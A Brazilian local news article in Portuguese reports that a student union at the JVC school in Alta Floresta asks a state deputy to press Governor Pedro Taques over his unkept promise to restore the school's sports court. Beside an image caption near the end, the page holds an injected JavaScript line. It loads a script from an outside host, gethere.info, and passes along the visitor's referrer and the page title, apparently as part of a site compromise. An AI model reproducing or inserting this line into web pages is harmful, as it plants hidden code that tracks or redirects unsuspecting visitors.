Capa / Em Destaque / Grêmio estudantil do JVC pede apoio para deputado em relação à promessa de Pedro Taques

Grêmio estudantil do JVC pede apoio para deputado em relação à promessa de Pedro Taques

Da Redação

Quadra JVC3

Quadra esportiva do JVC (centro)

O presidente do GEDA – Gremio Estudantil Discentes em Ação, da escola JVC Jr, no bairro Cidade Alta, Luciano Peres, protocolou ofício junto ao deputado estadual Romoaldo Junior-PMDB, pedindo a interferência no parlamentar no sentido de viabilizar a recuperação da quadra esportiva da escola.

Esta é no mínimo a segunda tentativa de Luciano e os integrantes do Grêmio em obter o benefício. No ano passado, quando a vinda do governador Pedro Taques à Alta Floresta, no final de novembro, houve a promessa de recuperação. Como a promessa não foi cumprida, a saída foi apelar pela ação do parlamentar no sentido de intensificar a cobrança junto à Secretaria De Educação do Estado.

“Quando da vinda do governador, eles pediram pra indicar uma escola para o governador visitar e eu indiquei o JVC, é uma escola que a gente ajudou a construir no governo de Jaime Campos, é uma escola que atende muito bem a Cidade Alta e precisa realmente de investimentos, principalmente nesta área esportiva, estou levando essa reivindicação do Grêmio Estudantil, vou marcar uma audiência com o governador e vou cobrar”, afirmou o deputado Romoaldo, assim que assinou o protocolo do ofício encaminhado pelo presidente do GEDA, o jovem Luciano Peres.

Romoaldo Junior afirmou que o governo Pedro Taques está com sérios problemas para resolver, dando como exemplo a educação, aonde um secretário foi preso por corrupção no próprio governo Taques, mesmo afirmando ter confiança em que o governo dará a contribuição que Alta Floresta tanto espera. “Eu conheço a vontade do governador de resolver o problema, são duas pendências que ele tem aqui muito sérias, é a UTI que ele prometeu também e a questão a restauração do JVC”, afirmou, elencando as “últimas promessas” de Taques para Alta Floresta.

Quadra JVC4s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top